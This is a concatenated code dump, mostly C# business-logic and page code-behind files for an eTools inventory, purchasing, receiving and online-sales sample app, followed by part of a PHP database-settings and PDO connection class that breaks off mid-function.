namespace eTools.Application.Security
{
internal class ApplicationDbContext : IdentityDbContext<ApplicationUser>
{
public ApplicationDbContext()
: base("DefaultConnection")
{
}
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace eTools.Data.Entities.Pocos
{
public class CategoryList
{
public int CategoryID { get; set; }
public string CategoryDescription { get; set; }
public int ItemCount { get; set; }
}
}
<file_sep>using eTools.Data.DAL;
using eTools.Data.Entities;
using eTools.Data.Entities.Pocos;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace eTools.Application.BLL
{
[DataObject]
public class ReceivingController
{
/// <summary>
/// Lists purchase orders that have been placed (OrderDate set) but not yet
/// closed, oldest first, with basic vendor contact details for the
/// receiving screen.
/// </summary>
public List<ViewPurchaseOrder> GetOpenPurchaseOrders()
{
    using (var context = new eToolsContext())
    {
        return context.PurchaseOrders
            .Where(order => order.Closed.Equals(false) && order.OrderDate.HasValue)
            .OrderBy(order => order.OrderDate)
            .Select(order => new ViewPurchaseOrder()
            {
                OrderNumber = order.PurchaseOrderID,
                DateOrdered = order.OrderDate,
                Name = order.Vendor.VendorName,
                ContactPhone = order.Vendor.Phone
            })
            .ToList();
    }
}
/// <summary>
/// Returns the detail lines of one purchase order, pre-shaped for the
/// receiving grid (Received/Returned start at zero for user entry).
/// NOTE(review): Outstanding is taken from StockItem.QuantityOnOrder, which
/// is the item's on-order total across ALL purchase orders — the
/// commented-out expression below computed a per-order outstanding instead.
/// Confirm which behaviour is intended.
/// </summary>
public List<ViewPurchaseOrderItems> GetPurchaseOrderDetails(int purchaseOrderID)
{
using (var context = new eToolsContext())
{
var result = from item in context.PurchaseOrderDetails
where item.PurchaseOrderID.Equals(purchaseOrderID)
select new ViewPurchaseOrderItems()
{
ItemID = item.StockItemID,
ItemDescription = item.StockItem.Description,
Ordered = item.Quantity,
//Outstanding = item.Quantity - item.ReceiveOrderDetails.Select(receive => receive.QuantityReceived).DefaultIfEmpty(0).Sum(),
Outstanding = item.StockItem.QuantityOnOrder,
Received = 0,
Returned = 0,
Reason = ""
};
return result.ToList();
}
}
/// <summary>
/// Records the receipt of a purchase order in one SaveChanges call:
/// optionally closes the order, writes a ReceiveOrder header, and for each
/// line writes received/returned detail rows and adjusts stock quantities.
/// </summary>
/// <param name="orderNumber">Purchase order being received.</param>
/// <param name="orderDetails">Per-line received/returned quantities from the UI.</param>
/// <param name="orderCompleted">True when every line is fully received, which closes the order.</param>
public void ReceivePurchaseOrder(int orderNumber, List<ViewPurchaseOrderItems> orderDetails, bool orderCompleted)
{
    using (var context = new eToolsContext())
    {
        // Mark the order closed (or keep it open) according to the caller.
        PurchaseOrder purchaseOrder = context.PurchaseOrders.Find(orderNumber);
        purchaseOrder.Closed = orderCompleted;
        context.Entry(purchaseOrder).Property("Closed").IsModified = true;
        // Header row for this receiving event.
        ReceiveOrder receiveOrder = new ReceiveOrder();
        receiveOrder.PurchaseOrderID = orderNumber;
        receiveOrder.ReceiveDate = DateTime.Now;
        context.ReceiveOrders.Add(receiveOrder);
        foreach (ViewPurchaseOrderItems item in orderDetails)
        {
            PurchaseOrderDetail purchaseOrderDetail = purchaseOrder.PurchaseOrderDetails.Where(order => order.StockItemID == item.ItemID).SingleOrDefault();
            // BUG FIX: the stock item is now looked up once per line.
            // Previously it was only loaded inside the "received" branch, so a
            // line that was returned without being received used the PREVIOUS
            // iteration's stock item (or null) for its returned-item
            // description.
            StockItem stockItem = context.StockItems.Find(item.ItemID);
            if (item.Received > 0)
            {
                ReceiveOrderDetail receiveOrderDetail = new ReceiveOrderDetail();
                receiveOrderDetail.ReceiveOrderID = receiveOrder.ReceiveOrderID;
                receiveOrderDetail.PurchaseOrderDetailID = purchaseOrderDetail.PurchaseOrderDetailID;
                receiveOrderDetail.QuantityReceived = item.Received;
                context.ReceiveOrderDetails.Add(receiveOrderDetail);
                // Received goods go into stock and come off the on-order
                // count, clamped at zero so over-shipments cannot go negative.
                stockItem.QuantityOnHand += item.Received;
                context.Entry(stockItem).Property("QuantityOnHand").IsModified = true;
                if (item.Received > stockItem.QuantityOnOrder)
                {
                    stockItem.QuantityOnOrder = 0;
                }
                else
                {
                    stockItem.QuantityOnOrder -= item.Received;
                }
                context.Entry(stockItem).Property("QuantityOnOrder").IsModified = true;
            }
            if (item.Returned > 0)
            {
                ReturnedOrderDetail returnedOrderDetail = new ReturnedOrderDetail();
                returnedOrderDetail.ReceiveOrderID = receiveOrder.ReceiveOrderID;
                returnedOrderDetail.PurchaseOrderDetailID = purchaseOrderDetail.PurchaseOrderDetailID;
                returnedOrderDetail.ItemDescription = stockItem.Description;
                returnedOrderDetail.Quantity = item.Returned;
                returnedOrderDetail.Reason = item.Reason;
                context.ReturnedOrderDetails.Add(returnedOrderDetail);
            }
        }
        // NOTE(review): detail rows reference receiveOrder.ReceiveOrderID,
        // which is 0 until SaveChanges assigns the identity key — confirm EF
        // relationship fix-up covers this in the entity model.
        context.SaveChanges();
    }
}
public void ForceClosePurchaseOrder(int orderNumber, string reason)
{
using (var context = new eToolsContext())
{
PurchaseOrder purchaseOrder = context.PurchaseOrders.Find(orderNumber);
purchaseOrder.Notes = reason;
context.Entry(purchaseOrder).Property("Notes").IsModified = true;
purchaseOrder.Closed = true;
context.Entry(purchaseOrder).Property("Closed").IsModified = true;
StockItem stockItem = null;
foreach (PurchaseOrderDetail item in purchaseOrder.PurchaseOrderDetails)
{
stockItem = context.StockItems.Find(item.StockItemID);
//stockItem.QuantityOnOrder -= item.Quantity - item.ReceiveOrderDetails.Select(receive => receive.QuantityReceived).DefaultIfEmpty(0).Sum();
stockItem.QuantityOnOrder = 0;
context.Entry(stockItem).Property("QuantityOnOrder").IsModified = true;
}
context.SaveChanges();
}
}
}
}<file_sep># ETools
An ASP.NET Web Forms / Entity Framework (C#/.NET) sample application for inventory, purchasing, receiving, and online sales.
<file_sep>using eTools.Data.DAL;
using eTools.Data.Entities;
using eTools.Data.Entities.Pocos;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
namespace eTools.Application.BLL
{
/// <summary>
/// BLL controller backing the purchasing (purchase-order creation) pages.
/// Exposed to ObjectDataSource controls via the [DataObject] attributes.
/// </summary>
[DataObject]
public class PurchasingController
{
    #region Lists
    /// <summary>
    /// Vendors that have a purchase order which has not yet been placed
    /// (OrderDate is null). The display text embeds the order number.
    /// </summary>
    [DataObjectMethod(DataObjectMethodType.Select, false)]
    public List<VendorList> ListVendors()
    {
        using (var context = new eToolsContext())
        {
            var ven = from buyer in context.PurchaseOrders
                      where buyer.OrderDate == null
                      orderby buyer.Vendor.VendorName
                      select new VendorList
                      {
                          VendorName = buyer.Vendor.VendorName+ "- " + buyer.PurchaseOrderID,
                          VendorID = buyer.VendorID
                      };
            return ven.ToList();
        }
    }

    /// <summary>
    /// All employees, ordered by last name, formatted "Last, First".
    /// </summary>
    [DataObjectMethod(DataObjectMethodType.Select, false)]
    public List<EmployeeList> ListEmployees()
    {
        using (eToolsContext context = new eToolsContext())
        {
            var emp = from buyer in context.Employees
                      orderby buyer.LastName ascending
                      select new EmployeeList
                      {
                          EmployeeName = buyer.LastName + ", " + buyer.FirstName,
                          EmployeeID = buyer.EmployeeID
                      };
            return emp.ToList();
        }
    }
    #endregion

    #region Get's
    /// <summary>
    /// Order-line info (stock levels, buffer, purchase price) for the given
    /// vendor's purchase-order details with a positive quantity.
    /// </summary>
    [DataObjectMethod(DataObjectMethodType.Select, false)]
    public List<OrderInfo> ListOrderInfo(int vendorid)
    {
        using (var context = new eToolsContext())
        {
            var info = from form in context.PurchaseOrderDetails
                       where form.PurchaseOrder.VendorID == vendorid
                       where form.Quantity > 0
                       select new OrderInfo
                       {
                           ItemID = form.StockItem.StockItemID,
                           Desc = form.StockItem.Description,
                           QOH = form.StockItem.QuantityOnHand,
                           ROL = form.StockItem.ReOrderLevel,
                           QOO = form.StockItem.QuantityOnOrder,
                           // Buffer = how far on-hand stock sits above the re-order level.
                           Buffer = form.StockItem.QuantityOnHand - form.StockItem.ReOrderLevel,
                           PurchasePrice = form.PurchasePrice
                       };
            return info.ToList();
        }
    }

    /// <summary>
    /// Purchase-order lines for the given vendor shaped for the ordered-items
    /// grid (stock levels plus the ordered quantity and purchase price).
    /// </summary>
    [DataObjectMethod(DataObjectMethodType.Select, false)]
    public List<PurchaseOrdersList> ListPurchaseOrder(int vendorid)
    {
        using (var context = new eToolsContext())
        {
            var result = from data in context.PurchaseOrderDetails
                         where data.PurchaseOrder.VendorID == vendorid
                         // NOTE(review): this condition is always true by the
                         // navigation relationship — confirm it can be removed.
                         where data.StockItem.StockItemID == data.StockItemID
                         where data.Quantity > 0
                         select new PurchaseOrdersList()
                         {
                             StockItemID = data.StockItem.StockItemID,
                             Description = data.StockItem.Description,
                             QuantityOnHand = data.StockItem.QuantityOnHand,
                             ReOrderLevel = data.StockItem.ReOrderLevel,
                             QuantityOnOrder = data.StockItem.QuantityOnOrder,
                             PurchaseOrderQuantity = data.Quantity,
                             PPrice = data.StockItem.PurchasePrice
                         };
            return result.ToList();
        }
    }

    /// <summary>
    /// Header statistics (vendor info, subtotal, GST, total) for the vendor's
    /// first purchase order, or null when the vendor has none.
    /// NOTE(review): FirstOrDefault is not filtered to open/unplaced orders —
    /// confirm which order is intended when a vendor has several.
    /// </summary>
    [DataObjectMethod(DataObjectMethodType.Select, false)]
    public PurchaseOrderStats GetPurchaseOrderInfo(int vendorid)
    {
        PurchaseOrderStats results = null;
        using (var context = new eToolsContext())
        {
            var theOrder = (from x in context.PurchaseOrders
                            where x.VendorID == vendorid
                            select x).FirstOrDefault();
            if (theOrder != null)
            {
                results = new PurchaseOrderStats()
                {
                    ID = theOrder.PurchaseOrderID,
                    Location = theOrder.Vendor.City,
                    Name = theOrder.Vendor.VendorName,
                    Phone = theOrder.Vendor.Phone,
                    GST = theOrder.TaxAmount,
                    Subtotal = theOrder.SubTotal,
                    Total = theOrder.SubTotal + theOrder.TaxAmount
                };
            }
            return results;
        }
    }
    #endregion

    #region PO CRUD
    /// <summary>Adds a new purchase order.</summary>
    [DataObjectMethod(DataObjectMethodType.Insert, false)]
    public void StartOrder (PurchaseOrder item)
    {
        using (var context = new eToolsContext())
        {
            var added = context.PurchaseOrders.Add(item);
            context.SaveChanges();
        }
    }

    /// <summary>Deletes an existing purchase order by its key.</summary>
    [DataObjectMethod(DataObjectMethodType.Delete, false)]
    public void DeleteOrder (PurchaseOrder item)
    {
        using (var context = new eToolsContext())
        {
            var existing = context.PurchaseOrders.Find(item.PurchaseOrderID);
            context.PurchaseOrders.Remove(existing);
            context.SaveChanges();
        }
    }

    /// <summary>Saves all changes to an existing purchase order.</summary>
    [DataObjectMethod(DataObjectMethodType.Update, false)]
    public void UpdateOrder (PurchaseOrder item)
    {
        using(eToolsContext context = new eToolsContext())
        {
            var attached = context.PurchaseOrders.Attach(item);
            var existing = context.Entry(attached);
            existing.State = System.Data.Entity.EntityState.Modified;
            context.SaveChanges();
        }
    }
    #endregion

    #region Vendor
    /// <summary>
    /// NOTE(review): despite taking a PurchaseOrderDetail, this removes the
    /// referenced row from StockItems (the catalogue), not the order line —
    /// confirm this is really the intended behaviour before relying on it.
    /// </summary>
    [DataObjectMethod(DataObjectMethodType.Delete, false)]
    public void DeleteItem(PurchaseOrderDetail item)
    {
        using (var context = new eToolsContext())
        {
            var existing = context.StockItems.Find(item.StockItemID);
            context.StockItems.Remove(existing);
            context.SaveChanges();
        }
    }
    #endregion
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace eTools.Data.Entities.Pocos
{
    /// <summary>
    /// View model for one order line on the purchasing screen: stock levels,
    /// the on-hand buffer above the re-order level, and the purchase price.
    /// </summary>
    public class OrderInfo
    {
        public int ItemID { get; set; }
        public string Desc { get; set; }
        // Quantity on hand.
        public int QOH { get; set; }
        // Re-order level.
        public int ROL { get; set; }
        // Quantity on order.
        public int QOO { get; set; }
        // QOH minus ROL (how far stock sits above the re-order level).
        public int Buffer { get; set; }
        public decimal PurchasePrice { get; set; }
    }
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using eTools.Application.BLL;
using Microsoft.AspNet.Identity;
using eTools.Data.Entities;
using eTools.Data;
using System.Data;
// Code-behind for the shop/cart page: lists stock items by category and lets
// the signed-in user add items to (or update quantities in) a shopping cart.
public partial class Tasks_ViewCart : System.Web.UI.Page
{
    // First load: show every stock item (category id 0 = no filter).
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!Page.IsPostBack)
        {
            SalesController controller = new SalesController();
            int catId = 0;
            ItemReapter.DataSource = controller.GetStockItemList(catId);
            ItemReapter.DataBind();
        }
    }

    // Category button: re-bind the repeater to the chosen category.
    protected void btn_category_Command(object sender, CommandEventArgs e)
    {
        int catId = int.Parse(e.CommandArgument.ToString());
        SalesController controller = new SalesController();
        ItemReapter.DataSource = null;
        ItemReapter.DataSource = controller.GetStockItemList(catId);
        ItemReapter.DataBind();
    }

    // "All" button: re-bind with category 0 (all items).
    protected void All_Click(object sender, EventArgs e)
    {
        SalesController controller = new SalesController();
        int id = 0;
        ItemReapter.DataSource = null;
        ItemReapter.DataSource = controller.GetStockItemList(id);
        ItemReapter.DataBind();
    }

    // Handles the per-row Add / Update buttons inside the item repeater.
    protected void ItemReapter_ItemCommand(object source, RepeaterCommandEventArgs e)
    {
        if (e.CommandName == "Add")
        {
            //int i;
            int itemCode = Convert.ToInt32(e.CommandArgument.ToString());
            string username = User.Identity.GetUserName();
            DateTime Today = DateTime.Today;
            TextBox quantity = e.Item.FindControl("Quantity") as TextBox;
            int counts = Convert.ToInt32(quantity.Text);
            OnlineCustomer newCustomer = new OnlineCustomer();
            SalesController sysmgr = new SalesController();
            // Lazily create the online-customer record on first purchase.
            if (sysmgr.GetOnlineCustomerIDByUserName(username) == 0)
            {
                newCustomer.UserName = username;
                newCustomer.CreatedOn = Today;
                // NOTE(review): the returned id is never used afterwards.
                int onlineCustomerId = sysmgr.AddOnlineCustomer(newCustomer);
            }
            // Lazily create the shopping cart as well.
            if (sysmgr.GetShoppingCartByUserName(username) == 0)
            {
                ShoppingCart newShoppingCart = new ShoppingCart();
                newShoppingCart.OnlineCustomerID = sysmgr.FindCustomerID(username);
                newShoppingCart.CreatedOn = Today;
                sysmgr.AddShoppingCart(newShoppingCart);
            }
            // Add the item; on success flip the row's Add button to Update
            // and show the added quantity.
            MessageUserControl.TryRun(() =>
            {
                sysmgr.AddToShoppingCart(itemCode, username, counts);
                Button add = e.Item.FindControl("Add") as Button;
                LinkButton update = e.Item.FindControl("Update") as LinkButton;
                Label itemCount = e.Item.FindControl("itemCount") as Label;
                add.Visible = false;
                update.Visible = true;
                itemCount.Text = quantity.Text;
            }, "Success", "New Item has been added to your shopping cart.");
        }
        if (e.CommandName == "Update")
        {
            if (int.Parse((e.Item.FindControl("Quantity") as TextBox).Text) < 1)
            {
                MessageUserControl.ShowInfo("Quantity should greater than 0.");
            }
            else
            {
                SalesController sysmgr = new SalesController();
                string username = User.Identity.GetUserName();
                int quantity = int.Parse((e.Item.FindControl("Quantity") as TextBox).Text);
                int itemCode = Convert.ToInt32(e.CommandArgument.ToString());
                int OnlineCustomerID = sysmgr.FindCustomerID(username);
                int shoppingCartItemID = sysmgr.GetShoppingCartItemID(OnlineCustomerID);
                // NOTE(review): the displayed count is incremented by the entered
                // quantity — confirm whether Update should add to or replace it.
                MessageUserControl.TryRun(() =>
                {
                    sysmgr.UpdateToShoppingCart(itemCode, shoppingCartItemID, username, quantity);
                    Label itemCount = e.Item.FindControl("itemCount") as Label;
                    itemCount.Text = (int.Parse(itemCount.Text) + quantity).ToString();
                }, "Success", "Item quantity was updated");
            }
        }
    }
}<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace eTools.Data.Entities.Pocos
{
    /// <summary>
    /// View model for one line of a shopping cart: item, quantity, unit
    /// selling price and the computed line total.
    /// </summary>
    public class ShoppingCartItemList
    {
        public string Description { get; set; }
        public int Quantity { get; set; }
        public decimal SellingPrice { get; set; }
        // Line total for this cart row.
        public decimal ItemTotal { get; set; }
        public int StockItemID { get; set; }
        public int ShoppingCartItemID { get; set; }
    }
}
<file_sep>using eTools.Application.BLL;
using eTools.Data.Entities;
using eTools.Data.Entities.Pocos;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
// Code-behind for the purchasing/product page: moves rows between the
// ordered-items grid (POrderResultsList) and the other-items grid
// (OtherItemsView). Several handlers are still unimplemented scaffolding.
public partial class Tasks_Product : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
    }

    // Routes ObjectDataSource exceptions to the shared message control.
    protected void CheckForException(object sender, ObjectDataSourceStatusEventArgs e)
    {
        MessageUserControl.HandleDataBoundException(e);
    }

    // TODO: not implemented yet.
    protected void PreviewButton_Click(object sender, EventArgs e)
    {
    }

    // TODO: not implemented yet.
    protected void DeleteOrderButton_Click(object sender, EventArgs e)
    {
    }

    // TODO: not implemented yet.
    protected void PlaceOrderButton_Click(object sender, EventArgs e)
    {
    }

    // Clears the page state by reloading the purchasing page.
    protected void ClearButton_Click(object sender, EventArgs e)
    {
        Response.Redirect("~/Tasks/Purchasing.aspx");
    }

    // TODO: not implemented yet.
    protected void POrderResultsList_RowDeleting(object sender, GridViewDeleteEventArgs e)
    {
    }

    // Moves the selected row out of the ordered-items grid.
    // NOTE(review): rows are rebuilt as empty PurchaseOrdersList objects, so
    // the grid's cell values are not actually carried over.
    protected void POrderResultsList_SelectedIndexChanging(object sender, GridViewSelectEventArgs e)
    {
        int index = e.NewSelectedIndex;
        GridViewRow row = POrderResultsList.Rows[index];
        int itemID = int.Parse(row.Cells[0].Text);
        Label stockLabel = row.FindControl("StockNumb") as Label;
        PurchaseOrdersList vendoritem = new PurchaseOrdersList();
        List<PurchaseOrdersList> existing = OtherItemsGridview(OtherItemsView);
        existing.Add(vendoritem);
        OtherItemsView.DataSource = existing;
        OtherItemsView.DataBind();
        List<PurchaseOrdersList> existingData = new List<PurchaseOrdersList>();
        foreach (GridViewRow theRow in OtherItemsView.Rows)
        {
            itemID = int.Parse(theRow.Cells[0].Text);
            existingData.Add(new PurchaseOrdersList());
        }
        existingData.RemoveAt(index);
        OtherItemsView.DataSource = existingData;
        OtherItemsView.DataBind();
    }

    // Reads the rows of the other-items grid back into a list.
    private List<PurchaseOrdersList> OtherItemsGridview(GridView gv)
    {
        List<PurchaseOrdersList> lists = new List<PurchaseOrdersList>();
        foreach (GridViewRow row in gv.Rows)
        {
            int stockid = int.Parse(row.Cells[0].Text);
            string desc = row.Cells[1].Text;
            int qoh = int.Parse(row.Cells[2].Text);
            int rol = int.Parse(row.Cells[3].Text);
            int qoo = int.Parse(row.Cells[4].Text);
            int pqty = int.Parse(row.Cells[5].Text);
            // BUG FIX: the price column holds a decimal; int.Parse threw a
            // FormatException on values such as "12.50".
            decimal pprice = decimal.Parse(row.Cells[6].Text);
            // Now I can create a ship object
            // NOTE(review): the parsed values above are never copied into the
            // object, so the row data is lost.
            PurchaseOrdersList frontLine = new PurchaseOrdersList();
            // Add it to my list
            lists.Add(frontLine);
        }
        return lists;
    }

    // Mirror operation for the other-items grid.
    // NOTE(review): this reads from POrderResultsList but rebinds
    // OtherItemsView in both halves — confirm the intended target grids.
    protected void OtherItemsView_SelectedIndexChanging(object sender, GridViewSelectEventArgs e)
    {
        int index = e.NewSelectedIndex;
        GridViewRow row = OtherItemsView.Rows[index];
        int itemID = int.Parse(row.Cells[0].Text);
        Label stockLabel = row.FindControl("StockNumb") as Label;
        PurchaseOrdersList vendoritem = new PurchaseOrdersList();
        List<PurchaseOrdersList> existing = BoughtItemsGridView(POrderResultsList);
        existing.Add(vendoritem);
        OtherItemsView.DataSource = existing;
        OtherItemsView.DataBind();
        List<PurchaseOrdersList> existingData = new List<PurchaseOrdersList>();
        foreach (GridViewRow theRow in OtherItemsView.Rows)
        {
            itemID = int.Parse(theRow.Cells[0].Text);
            existingData.Add(new PurchaseOrdersList());
        }
        existingData.RemoveAt(index);
        OtherItemsView.DataSource = existingData;
        OtherItemsView.DataBind();
    }

    // Reads the rows of the ordered-items grid back into a list.
    private List<PurchaseOrdersList> BoughtItemsGridView(GridView gv)
    {
        List<PurchaseOrdersList> lists = new List<PurchaseOrdersList>();
        foreach (GridViewRow row in gv.Rows)
        {
            int stockid = int.Parse(row.Cells[0].Text);
            string desc = row.Cells[1].Text;
            int qoh = int.Parse(row.Cells[2].Text);
            int rol = int.Parse(row.Cells[3].Text);
            int qoo = int.Parse(row.Cells[4].Text);
            int pqty = int.Parse(row.Cells[5].Text);
            // BUG FIX: same as above — parse the price as a decimal.
            decimal pprice = decimal.Parse(row.Cells[6].Text);
            // Now I can create a ship object
            PurchaseOrdersList frontLine = new PurchaseOrdersList();
            // Add it to my list
            lists.Add(frontLine);
        }
        return lists;
    }
}<file_sep>using System;
namespace eTools.Data.Entities.Pocos
{
    /// <summary>
    /// View model for one open purchase order row on the receiving screen:
    /// order number, placement date, vendor name and contact phone.
    /// </summary>
    public class ViewPurchaseOrder
    {
        public int OrderNumber { get; set; }
        // Null until the order has actually been placed.
        public DateTime? DateOrdered { get; set; }
        public string Name { get; set; }
        public string ContactPhone { get; set; }
    }
}
<file_sep>using eTools.Application.BLL;
using eTools.Data.Entities.Pocos;
using Microsoft.AspNet.Identity;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
// Code-behind for the place-order page: shows the signed-in user's cart
// items with subtotal/total and applies a coupon discount.
public partial class Tasks_PlaceOrder : System.Web.UI.Page
{
    // First load: populate the cart listing for the signed-in user.
    protected void Page_Load(object sender, EventArgs e)
    {
        string username = User.Identity.GetUserName();
        if (!IsPostBack)
        {
            if (!string.IsNullOrEmpty(username))
            {
                ShoppingCartItemData();
            }
            else
            {
                // NOTE(review): anonymous users fall through silently.
            }
        }
    }

    // Binds the user's cart items and fills the subtotal/total labels.
    public void ShoppingCartItemData()
    {
        string username = User.Identity.GetUserName();
        SalesController controller = new SalesController();
        List<ShoppingCartItemList> itemList = new List<ShoppingCartItemList>();
        itemList = controller.GetShoppingCartItems(username);
        OrderReapter.DataSource = itemList;
        OrderReapter.DataBind();
        int shoppingCardID = controller.GetShoppingCartID(username);
        decimal subTotal = controller.GetSubTotal(shoppingCardID);
        lbl_subTotal.Text = subTotal.ToString();
        // NOTE(review): the total starts equal to the subtotal (no tax or
        // shipping added) — confirm that is intended.
        lbl_total.Text = ((double)subTotal).ToString();
    }

    // Coupon "Update" button: recomputes the discount and the total.
    protected void Update_Click(object sender, EventArgs e)
    {
        SalesController controller = new SalesController();
        // NOTE(review): this guards on the discount label's current text, not
        // on the coupon textbox (Coupon.Text) that is actually used below —
        // it looks like the condition should test Coupon.Text; confirm
        // against the page markup before changing.
        if(!string.IsNullOrEmpty(lbl_discount.Text))
        {
            // Discount is a whole-number percentage looked up by coupon code.
            int discount = controller.GetCoupons(Coupon.Text);
            lbl_discount.Text = (discount * double.Parse(lbl_subTotal.Text)*0.01).ToString();
            lbl_total.Text = (double.Parse(lbl_subTotal.Text) * (1 - discount * 0.01)).ToString();
        }
    }
} | 53bba6f3569c9e48dbbab5f7ab9a87e471f0b8b7 | [
"Markdown",
"C#"
] | 22 | C# | SharkSix/ETools | 5dd50158cc8ce535c986546c2d1d12f9fd2243d2 | 9d8a40c1e54dce9f1d6331d8536d51bb7d9612b1 |
refs/heads/master | <repo_name>SatyaJupudi/TradingProject<file_sep>/Web: Integrated/src/com/trader/feedchecker/TestYahoo.java
package com.trader.feedchecker;
import java.sql.Connection;
import java.sql.Date;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.Calendar;
import java.util.Map;
import com.trader.util.OpenConnection;
// Get quote data from Yahoo, usage java TestYahoo <stock1> <stock2> ....
// Get quote data from Yahoo, usage: java TestYahoo <stock1> <stock2> ...
// Polls quotes for the subscribed symbols and appends a row to
// tbl_SubscribedStocks whenever a symbol's bid price changes.
public class TestYahoo implements Runnable
{
    private static String output;
    private volatile boolean isRunning = true;
    private volatile String[] symbols;

    public TestYahoo(String... symbols) {
        this.symbols = symbols;
    }

    /**
     * Polling loop: runs until kill() is called. For each symbol the latest
     * bid is compared against the last-seen bid (seeded from the newest DB
     * row) and a new price row is inserted when it changes.
     */
    public void start() {
        if (symbols == null || symbols.length == 0) {
            return; // nothing to poll (e.g. the no-arg constructor path)
        }
        // BUG FIX: the last-seen bid must be tracked per symbol; the original
        // kept a single float shared by every symbol, so with more than one
        // symbol every quote looked like a change.
        java.util.Map<String, Float> lastBid = new java.util.HashMap<String, Float>();

        OpenConnection connectionPool = new OpenConnection("javaDemoDB");
        connectionPool.start();
        Connection con = connectionPool.getConnection();
        GetYahooMarketData yahooReader = new GetYahooMarketData();

        while (isRunning) {
            Map<String, GetYahooMarketData.QuoteData> data = null;
            try {
                data = yahooReader.getQuote(symbols);
            } catch (Exception e) {
                e.printStackTrace();
            }
            if (data != null) {
                for (Map.Entry<String, GetYahooMarketData.QuoteData> entry : data.entrySet()) {
                    GetYahooMarketData.QuoteData quote = entry.getValue();
                    String symbolName = entry.getKey();

                    // Seed the last-seen bid from the newest stored row, once per symbol.
                    if (!lastBid.containsKey(symbolName)) {
                        // BUG FIX: statements and result sets are now closed via
                        // try-with-resources; the original leaked them on every pass.
                        try (PreparedStatement pstSelect = con.prepareStatement(
                                "SELECT bid FROM tbl_SubscribedStocks WHERE symbol = ? ORDER BY ts DESC LIMIT 1")) {
                            pstSelect.setString(1, symbolName);
                            try (ResultSet rs = pstSelect.executeQuery()) {
                                if (rs.next()) {
                                    lastBid.put(symbolName, Float.parseFloat(rs.getString(1)));
                                }
                            }
                        } catch (SQLException e) {
                            System.out.println(e);
                        }
                    }

                    Float previous = lastBid.get(symbolName);
                    if (previous == null || quote.bidPrice != previous.floatValue()) {
                        try (PreparedStatement pstInsert = con.prepareStatement(
                                "INSERT INTO tbl_SubscribedStocks VALUES (?, ?, ?, ?)")) {
                            pstInsert.setString(1, symbolName);
                            pstInsert.setString(2, Float.toString(quote.bidPrice));
                            pstInsert.setString(3, Float.toString(quote.askPrice));
                            pstInsert.setDate(4, new Date(Calendar.getInstance().getTimeInMillis()));
                            pstInsert.execute();
                        } catch (SQLException e) {
                            System.out.println(e);
                        }
                    }
                    lastBid.put(symbolName, quote.bidPrice);
                }
            }
            try {
                // BUG FIX: throttle the poll; the original spun a busy loop.
                Thread.sleep(1000);
            } catch (InterruptedException e) {
                Thread.currentThread().interrupt();
                break;
            }
        }
    }

    // Thread entry point. BUG FIX: this was empty, so a thread started with
    // this Runnable (as in main) did nothing.
    public void run() {
        start();
    }

    public static void main(String[] args) {
        // BUG FIX: pass the command-line symbols through; the original
        // constructed TestYahoo with no symbols.
        (new Thread(new TestYahoo(args))).start();
    }

    // Signals the polling loop to stop after the current pass.
    public void kill() {
        isRunning = false;
    }

    private static void setOutput(String output) {
        TestYahoo.output = output;
    }

    public String getOutput() {
        return output;
    }
}
| 141999c868842008cf571557aba26c62471d1d2d | [
"Java"
] | 1 | Java | SatyaJupudi/TradingProject | a849f6cd1301f498cc672f83e885168e0363389d | a3731221c2882e240b538484d2c1a8b60c3936a8 |
refs/heads/master | <file_sep><?php
// Central database-connection settings for the application.
class Settings {
    //////// write your own values here (was: "ovde pisete gi vasite")
    // NOTE(review): $ServerIP has no getter and is never read — confirm
    // whether it can be removed.
    private $ServerIP="127.0.0.1";
    private $serverName="localhost";
    private $userName="root";
    // Redacted in this copy of the source; set the real password locally.
    private $password="<PASSWORD>";
    private $dbName="pazari";
    /////// getters for the private attributes
    public function getServerName()
    {
        return $this->serverName;
    }
    public function getDbName()
    {
        return $this->dbName;
    }
    public function getUserName()
    {
        return $this->userName;
    }
    public function getPassword()
    {
        return $this->password;
    }
}
/*
 * Thin PDO wrapper: opens a connection per query, runs the query as a
 * prepared statement and, for SELECT-style calls, fetches and prints the
 * result set.
 */
class connection
{
    /*
     * Settings instance supplied to the constructor.
     * NOTE(review): execQuery() currently takes its own Settings parameter
     * and never reads this field — confirm which one should win.
     */
    private $sett;

    public function __construct(Settings $set) {
        $this->sett = $set;
    }

    /*
     * Active PDO connection (null when closed).
     */
    private $conn;

    /*
     * Closes the database connection by dropping the PDO handle.
     */
    function CloseDbConnection()
    {
        $this->conn = null;
    }

    /*
     * Runs $kveri as a prepared statement against the database described by
     * $sett. When $isSelect is true the result set is fetched as associative
     * arrays and printed (debug output; the UI is expected to render tables).
     */
    function execQuery($kveri, Settings $sett, $isSelect)
    {
        try
        {
            // BUG FIX: the DSN was previously built inside a single-quoted
            // string ('mysql:host$sett->getServerName();...'), so the host and
            // database name were passed literally and never interpolated.
            $dsn = "mysql:host=" . $sett->getServerName() . ";dbname=" . $sett->getDbName();
            $this->conn = new PDO($dsn, $sett->getUserName(), $sett->getPassword());
            $this->conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

            // Prepare and execute the caller's query.
            $zemi = $this->conn->prepare($kveri);
            $zemi->execute();

            if ($isSelect == true)
            {
                // Fetch SELECT results as associative arrays.
                $zemi->setFetchMode(PDO::FETCH_ASSOC);
                $result = $zemi->fetchAll();
                // WARNING: debug print only — used while testing.
                print_r($result);
            }
        }
        catch (PDOException $e)
        {
            // Connection/query failure: surface the PDO error to the page.
